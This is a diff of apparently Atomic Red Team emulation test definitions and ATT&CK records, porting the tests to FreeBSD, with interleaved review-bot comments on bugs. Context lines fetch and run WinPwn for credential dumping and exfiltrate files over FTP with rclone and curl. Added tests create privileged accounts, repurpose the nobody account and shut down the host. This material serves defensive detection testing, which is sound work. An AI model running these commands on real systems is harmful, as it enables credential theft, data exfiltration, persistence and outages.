+ "auto_generated_guid": "d2791d72-b67f-4615-814f-ec824a91f514",
+ "description": "Use the netstat command to display the kernels routing tables.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "netstat -r | grep default\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "Remote System Discovery - ip tcp_metrics",
 "auto_generated_guid": "6c2da894-0b57-43cb-87af-46ea3b501388",
@@ -633797,7 +635587,7 @@
 {
 "name": "Port Scan Nmap",
 "auto_generated_guid": "515942b0-a09f-4163-a7bb-22fefb6f185f",
- "description": "Scan ports to check for listening ports with Nmap.\n\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.\n",
+ "description": "Scan ports to check for listening ports with Nmap.\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.\n",
 "supported_platforms": [
 "linux",
 "macos"
@@ -633824,12 +635614,12 @@
 {
 "description": "Check if nmap command exists on the machine\n",
 "prereq_command": "if [ -x \"$(command -v nmap)\" ]; then exit 0; else exit 1; fi;\n",
- "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
+ "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)\n"
 },
 {
 "description": "Check if nc command exists on the machine\n",
 "prereq_command": "if [ -x \"$(command -v nc)\" ]; then exit 0; else exit 1; fi;\n",
- "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n"
+ "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)\n"
 },
 {
 "description": "Check if telnet command exists on the machine\n",
@@ -636273,7 +638063,7 @@ } ], "command_list": [ - "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" + "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n[ \"$(uname)\" = 'FreeBSD' ] && /bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" && echo \"exit\" >> \"testdirwithspaceend /init \" || /usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" ], "commands": [], "queries": [], 
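Review bot: The platform switch in the new T1036.006 command is an `A && B && C && D || E` chain, so if any step of the FreeBSD branch fails (a missing `python3.9`, a failed redirect into `"testdirwithspaceend /init "`) the shell falls through and also runs the Linux `ed`/perl branch on the FreeBSD host; an explicit `if [ "$(uname)" = 'FreeBSD' ]; then …; else …; fi` keeps the two branches exclusive. The FreeBSD branch hard-codes `python3.9`, which breaks on hosts with any other minor version, and `/bin/echo "#\!/bin/sh"` writes the backslash into the file because `/bin/echo` does not process `\!`, so the first line is not a valid interpreter line. The executor copy of this same command in the first hunk on the next line has the same shape and needs the same change.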
@@ -636306,8 +638096,8 @@ "linux" ], "executor": { - "name": "bash", - "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "name": "sh", + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n[ \"$(uname)\" = 'FreeBSD' ] && /bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" && echo \"exit\" >> \"testdirwithspaceend /init \" || /usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", "cleanup_command": "rm -rf /tmp/atomic-test-T1036.006" } } @@ -639637,9 +641427,18 @@ "default": "victim" } }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "rsync must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v rsync)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "(pkg install -y rsync)||(sudo apt-get -y install rsync)\n" + } + ], "executor": { "command": "rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}\n", - "name": "bash" + "name": "sh", + "elevation_required": true } }, { 
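Review bot: `"elevation_required": true` is added to the rsync push test only; the rsync pull test in the first hunk on the next line receives the identical dependency block but no elevation flag, and neither `rsync -r` invocation needs root, so the flag looks accidental and should either be dropped here or justified in the description. The shared `get_prereq_command`, `(pkg install -y rsync)||(sudo apt-get -y install rsync)`, has no yum branch, unlike the nmap/nc prerequisites earlier in this diff, so the dependency cannot be installed on RPM-based hosts the test claims to support.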
@@ -639672,9 +641471,17 @@
 "default": "adversary"
 }
 },
+ "dependency_executor_name": "sh",
+ "dependencies": [
+ {
+ "description": "rsync must be installed on the machine \n",
+ "prereq_command": "if [ -x \"$(command -v rsync)\" ]; then exit 0; else exit 1; fi\n",
+ "get_prereq_command": "(pkg install -y rsync)||(sudo apt-get -y install rsync)\n"
+ }
+ ],
 "executor": {
 "command": "rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}\n",
- "name": "bash"
+ "name": "sh"
 }
 },
 {
@@ -639709,7 +641516,7 @@
 },
 "executor": {
 "command": "scp #{local_file} #{username}@#{remote_host}:#{remote_path}\n",
- "name": "bash"
+ "name": "sh"
 }
 },
 {
@@ -639744,7 +641551,7 @@
 },
 "executor": {
 "command": "scp #{username}@#{remote_host}:#{remote_file} #{local_path}\n",
- "name": "bash"
+ "name": "sh"
 }
 },
 {
@@ -639779,7 +641586,7 @@
 },
 "executor": {
 "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n",
- "name": "bash"
+ "name": "sh"
 }
 },
 {
@@ -639814,7 +641621,7 @@
 },
 "executor": {
 "command": "sftp #{username}@#{remote_host}:#{remote_file} #{local_path}\n",
- "name": "bash"
+ "name": "sh"
 }
 },
 {
@@ -671366,10 +673173,11 @@
 }
 },
 {
- "name": "System Time Discovery in macOS",
+ "name": "System Time Discovery in FreeBSD/macOS",
 "auto_generated_guid": "f449c933-0891-407f-821e-7916a21a1a6f",
 "description": "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n",
 "supported_platforms": [
+ "linux",
 "macos"
 ],
 "executor": {
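Review bot: The sftp push command, `sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'`, uses a bash here-string and `$'…'` quoting, which POSIX `sh` (dash on Debian-family Linux, FreeBSD's `/bin/sh`) rejects as a syntax error, so switching that executor from `bash` to `sh` breaks the test rather than porting it. Feed the batch command through a pipe instead: `printf 'put #{local_file}\n' | sftp #{username}@#{remote_host}:#{remote_path}`. The other executor renames in these hunks (rsync, scp, sftp pull) carry plain commands and are fine under `sh`.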
@@ -671935,12 +673743,12 @@
 "dependencies": [
 {
 "description": "The `at` and `atd` executables must exist in the PATH\n",
- "prereq_command": "which at && which atd\n",
+ "prereq_command": "if [ \"$(uname)\" = 'FreeBSD' ]; then which at; else which at && which atd; fi;\n",
 "get_prereq_command": "echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'\n"
 },
 {
 "description": "The `atd` daemon must be running\n",
- "prereq_command": "systemctl status atd || service atd status\n",
+ "prereq_command": "if [ $(uname) = 'Linux' ]; then systemctl status atd || service atd status; fi;\n",
 "get_prereq_command": "echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'\n"
 }
 ],
@@ -681767,8 +683575,8 @@
 "auto_generated_guid": "0ac21132-4485-4212-a681-349e8a6637cd",
 "description": "Enable traffic redirection.\n\nNote that this test may conflict with pre-existing system configuration.\n",
 "supported_platforms": [
- "macos",
- "linux"
+ "linux",
+ "macos"
 ],
 "input_arguments": {
 "proxy_server": {
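Review bot: The second prerequisite, `if [ $(uname) = 'Linux' ]; then systemctl status atd || service atd status; fi;`, now exits 0 on every non-Linux platform without checking anything, so on FreeBSD (and on any other platform this test lists, which is outside the hunk) the daemon is never verified although the `get_prereq_command` message still assumes it was. If the intent is only to skip the check on FreeBSD, say so: `if [ "$(uname)" = 'FreeBSD' ]; then exit 0; else systemctl status atd || service atd status; fi;`. The first prerequisite quotes `"$(uname)"` while the second leaves it unquoted; quote both, since an empty expansion turns `[ = 'Linux' ]` into a syntax error.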
@@ -688520,7 +690328,7 @@ "Send-MailMessage -From test@corp.com -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer 127.0.0.1\n", "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", "$rclone_bin = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"rclone.exe\" | Select-Object -ExpandProperty FullName\n$exfil_pack = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"exfil.zip\" | Select-Object -ExpandProperty FullName\n&$rclone_bin config create ftpserver \"ftp\" \"host\" ftp.dlptest.com \"port\" 21 \"user\" dlpuser \"pass\" rNrKYTX9g7z3RgJRmxWuGHbeu\n&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate", - "if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n", + "[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9\nif [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n", "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = 
[System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" ], @@ -688537,7 +690345,7 @@ { "name": "Exfiltration Over Alternative Protocol - HTTP", "auto_generated_guid": "1d1abbd6-a3d3-4b2e-bef5-c59293f46eff", - "description": "A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", + "description": "A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", "supported_platforms": [ "macos", "linux" @@ -688729,7 +690537,7 @@ "executor": { "name": "sh", "elevation_required": false, - "command": "if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n" + "command": "[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9\nif [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi\n" } } ] 
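Review bot: `alias python3=python3.9` cannot make the following `if [ $(which python3) ]` succeed, because `which` searches PATH and ignores shell aliases, so on a FreeBSD host with no `python3` binary the HTTP server is still never started and the added line is a no-op; where a `python3` binary does exist the alias merely shadows it with a hard-coded minor version. A variable is the portable form: `PY=python3; [ "$(uname)" = 'FreeBSD' ] && PY=python3.9`, then test with `command -v "$PY"` and start with `"$PY" -m http.server 9090`. The same line is added to the executor copy of this command in the last hunk on this line and should change with it.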
@@ -692267,8 +694075,11 @@ "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", "useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art\nsu art\nwhoami\nexit\n", + "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n", "useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art\nusermod --lock art\nusermod --expiredate \"1\" art\nusermod --unlock art\nusermod --expiredate \"99999\" art\nsu art\nwhoami\nexit\n", - "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n" + "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0\npw lock art\npw usermod art -e +1d\npw unlock art\npw user mod art -e +99d\nsu art\nwhoami\nexit\n", + "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n", + "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" ], "commands": [], "queries": [], 
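Review bot: In both new `pw` command lines the password is set on `testuser1` rather than on the `art` account just created (`echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0`), so the following `su art` cannot succeed and the command exits on an account that was never given a password. Per pw(8), `-h fd` reads a cleartext password from the descriptor while `-H fd` reads an already-hashed one, so the hash from `openssl passwd -1` is being installed as the literal password; `echo art | pw mod user art -h 0` (or keep the hash and use `-H 0`) gives the intended result. The identical lines reappear in the "Create local account (FreeBSD)" and "Reactivate a locked/expired account (FreeBSD)" test definitions added on the next line, and the new nobody line has the same `-h`/hash mismatch with `pw mod user nobody -h 0`.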
@@ -692397,6 +694208,20 @@
 "cleanup_command": "userdel -r art \n"
 }
 },
+ {
+ "name": "Create local account (FreeBSD)",
+ "auto_generated_guid": "95158cc9-8f6d-4889-9531-9be3f7f095e0",
+ "description": "An adversary may wish to create an account with admin privileges to work with. In this test we create a \"art\" user with the password art, switch to art, execute whoami, exit and delete the art user.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "name": "sh",
+ "elevation_required": true,
+ "command": "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n",
+ "cleanup_command": "rmuser -y art\n"
+ }
+ },
 {
 "name": "Reactivate a locked/expired account (Linux)",
 "auto_generated_guid": "d2b95631-62d7-45a3-aaef-0972cea97931",
@@ -692411,6 +694236,20 @@
 "cleanup_command": "userdel -r art \n"
 }
 },
+ {
+ "name": "Reactivate a locked/expired account (FreeBSD)",
+ "auto_generated_guid": "09e3380a-fae5-4255-8b19-9950be0252cf",
+ "description": "A system administrator may have locked and expired a user account rather than deleting it. \"the user is coming back, at some stage\" An adversary may reactivate a inactive account in an attempt to appear legitimate. \n\nIn this test we create a \"art\" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "name": "sh",
+ "elevation_required": true,
+ "command": "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user testuser1 -h 0\npw lock art\npw usermod art -e +1d\npw unlock art\npw user mod art -e +99d\nsu art\nwhoami\nexit\n",
+ "cleanup_command": "rmuser -y art \n"
+ }
+ },
 {
 "name": "Login as nobody (Linux)",
 "auto_generated_guid": "3d2cd093-ee05-41bd-a802-59ee5c301b85",
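Review bot: In "Reactivate a locked/expired account (FreeBSD)" the expiry step `pw usermod art -e +1d` sets the expiration one day in the future, so the account is never actually expired before `pw unlock art` / `pw user mod art -e +99d` renew it, and the description's "try to su to art and fail" has no corresponding step in the command; the Linux variant above uses a past date (`--expiredate "1"`), and the FreeBSD one should do the same with a date in the past per pw(8) rather than `+1d`. The command also mixes `pw usermod` and `pw user mod` for the same operation; pick one spelling. The cleanup `rmuser -y art ` carries a trailing space, harmless but inconsistent with the sibling test.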
@@ -692424,6 +694263,20 @@
 "command": "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nchsh --shell /bin/bash nobody\nusermod --password $(openssl passwd -1 nobody) nobody\nsu nobody\nwhoami\nexit\n",
 "cleanup_command": "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
 }
+ },
+ {
+ "name": "Login as nobody (freebsd)",
+ "auto_generated_guid": "16f6374f-7600-459a-9b16-6a88fd96d310",
+ "description": "An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "name": "sh",
+ "elevation_required": true,
+ "command": "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n",
+ "cleanup_command": "pw usermod nobody -s /usr/sbin/nologin\ncat /etc/passwd |grep nobody\n# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n"
+ }
 }
 ]
 }
@@ -694643,8 +696496,10 @@
 "shutdown -h now\n",
 "reboot\n",
 "halt -p\n",
+ "halt -r\n",
 "halt --reboot\n",
 "poweroff\n",
+ "poweroff -r 3\n",
 "poweroff --reboot\n",
 "shutdown /l \n"
 ],
@@ -694699,12 +696554,12 @@
 }
 },
 {
- "name": "Restart System via `shutdown` - macOS/Linux",
+ "name": "Restart System via `shutdown` - FreeBSD/macOS/Linux",
 "auto_generated_guid": "6326dbc4-444b-4c04-88f4-27e94d0327cb",
- "description": "This test restarts a macOS/Linux system.\n",
+ "description": "This test restarts a FreeBSD/macOS/Linux system.\n",
 "supported_platforms": [
- "macos",
- "linux"
+ "linux",
+ "macos"
 ],
 "input_arguments": {
 "timeout": {
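Review bot: "Login as nobody (freebsd)" sets the password from `openssl passwd -1 art` while its description says the password is changed to nobody, so either the description or the command is wrong; `echo nobody | pw mod user nobody -h 0` matches the description. The inline expected-output comment before the change shows `nobody:x:65534:…` and the cleanup's shows `nobody:*:65534:…`; FreeBSD's /etc/passwd uses `*`, so the first comment should read the same as the second. The name is the only one in this set written as lowercase "freebsd", and the cleanup resets the shell but never resets the password, leaving `nobody` with a known password after the test unless the password change is reverted too.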
@@ -694715,17 +696570,17 @@
 },
 "executor": {
 "command": "shutdown -r #{timeout}\n",
- "name": "bash",
+ "name": "sh",
 "elevation_required": true
 }
 },
 {
- "name": "Shutdown System via `shutdown` - macOS/Linux",
+ "name": "Shutdown System via `shutdown` - FreeBSD/macOS/Linux",
 "auto_generated_guid": "4963a81e-a3ad-4f02-adda-812343b351de",
- "description": "This test shuts down a macOS/Linux system using a halt.\n",
+ "description": "This test shuts down a FreeBSD/macOS/Linux system using a halt.\n",
 "supported_platforms": [
- "macos",
- "linux"
+ "linux",
+ "macos"
 ],
 "input_arguments": {
 "timeout": {
@@ -694736,34 +696591,47 @@
 },
 "executor": {
 "command": "shutdown -h #{timeout}\n",
- "name": "bash",
+ "name": "sh",
 "elevation_required": true
 }
 },
 {
- "name": "Restart System via `reboot` - macOS/Linux",
+ "name": "Restart System via `reboot` - FreeBSD/macOS/Linux",
 "auto_generated_guid": "47d0b042-a918-40ab-8cf9-150ffe919027",
- "description": "This test restarts a macOS/Linux system via `reboot`.\n",
+ "description": "This test restarts a FreeBSD/macOS/Linux system via `reboot`.\n",
 "supported_platforms": [
- "macos",
- "linux"
+ "linux",
+ "macos"
 ],
 "executor": {
 "command": "reboot\n",
- "name": "bash",
+ "name": "sh",
 "elevation_required": true
 }
 },
 {
- "name": "Shutdown System via `halt` - Linux",
+ "name": "Shutdown System via `halt` - FreeBSD/Linux",
 "auto_generated_guid": "918f70ab-e1ef-49ff-bc57-b27021df84dd",
- "description": "This test shuts down a Linux system using `halt`.\n",
+ "description": "This test shuts down a FreeBSD/Linux system using `halt`.\n",
 "supported_platforms": [
 "linux"
 ],
 "executor": {
 "command": "halt -p\n",
- "name": "bash",
+ "name": "sh",
+ "elevation_required": true
+ }
+ },
+ {
+ "name": "Reboot System via `halt` - FreeBSD",
+ "auto_generated_guid": "7b1cee42-320f-4890-b056-d65c8b884ba5",
+ "description": "This test restarts a FreeBSD system using `halt`.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "halt -r\n",
+ "name": "sh",
 "elevation_required": true
 }
 },
@@ -694781,15 +696649,28 @@
 }
 },
 {
- "name": "Shutdown System via `poweroff` - Linux",
+ "name": "Shutdown System via `poweroff` - FreeBSD/Linux",
 "auto_generated_guid": "73a90cd2-48a2-4ac5-8594-2af35fa909fa",
- "description": "This test shuts down a Linux system using `poweroff`.\n",
+ "description": "This test shuts down a FreeBSD/Linux system using `poweroff`.\n",
 "supported_platforms": [
 "linux"
 ],
 "executor": {
 "command": "poweroff\n",
- "name": "bash",
+ "name": "sh",
+ "elevation_required": true
+ }
+ },
+ {
+ "name": "Reboot System via `poweroff` - FreeBSD",
+ "auto_generated_guid": "5a282e50-86ff-438d-8cef-8ae01c9e62e1",
+ "description": "This test restarts a FreeBSD system using `poweroff`.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "executor": {
+ "command": "poweroff -r 3\n",
+ "name": "sh",
 "elevation_required": true
 }
 },
@@ -705044,7 +706925,7 @@
 "id": "relationship--03f56095-464f-4c51-b6aa-11b1641f17cf",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.850Z",
- "modified": "2022-03-30T14:26:51.850Z",
+ "modified": "2023-11-06T20:20:10.986Z",
 "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
 "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
 "relationship_type": "detects",
@@ -705053,10 +706934,10 @@
 ],
 "revoked": false,
 "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.",
+ "description": "Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.",
 "x_mitre_deprecated": false,
- "x_mitre_version": "",
- "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.2.0",
 "external_references": [],
 "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
 },
@@ -768301,7 +770182,7 @@
 "id": "relationship--2610bdef-0b08-46a8-94f5-cf253f11e5fc",
 "type": "relationship",
 "created": "2022-03-30T14:26:51.876Z",
- "modified": "2023-09-15T16:33:24.590Z",
+ "modified": "2023-11-10T18:22:01.595Z",
 "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
 "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
 "relationship_type": "detects",
@@ -768310,10 +770191,10 @@ ], "revoked": false, "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nA web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.\n\n

Analytic 1 - Webshell-Indicative Process Tree

\nsuspicious_processes = filter processes where (\n (parent_exe == \"w3wp.exe\" OR\n parent_exe == \"httpd.exe\" OR\n parent_exe == \"tomcat*.exe\" OR\n parent_exe == \"nginx.exe\" ) AND\n (exe == \"cmd.exe\" OR\n exe == \"powershell.exe\" OR\n exe == \"net.exe\" OR\n exe == \"whoami.exe\" OR\n exe == \"hostname.exe\" OR\n exe == \"systeminfo.exe\" OR\n exe == \"ipconfig.exe) )", + "description": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is very similar to the following short payload: (Citation: Lee 2013)\n\n``\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nA web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.\n\n

Analytic 1 - Webshell-Indicative Process Tree

\nsuspicious_processes = filter processes where (\n (parent_exe == \"w3wp.exe\" OR\n parent_exe == \"httpd.exe\" OR\n parent_exe == \"tomcat*.exe\" OR\n parent_exe == \"nginx.exe\" ) AND\n (exe == \"cmd.exe\" OR\n exe == \"powershell.exe\" OR\n exe == \"net.exe\" OR\n exe == \"whoami.exe\" OR\n exe == \"hostname.exe\" OR\n exe == \"systeminfo.exe\" OR\n exe == \"ipconfig.exe) )", "x_mitre_deprecated": false, "x_mitre_version": "0.1", - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "external_references": [ { "source_name": "NSA Cyber Mitigating Web Shells", @@ -897093,7 +898974,7 @@ "id": "relationship--6b8ba493-b6f0-48d2-ba77-a23a76e555e7", "type": "relationship", "created": "2022-03-30T14:26:51.846Z", - "modified": "2022-03-30T14:26:51.846Z", + "modified": "2023-11-06T20:19:32.835Z", "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "relationship_type": "detects", @@ -897102,10 +898983,10 @@ ], "revoked": false, "created_by_ref": 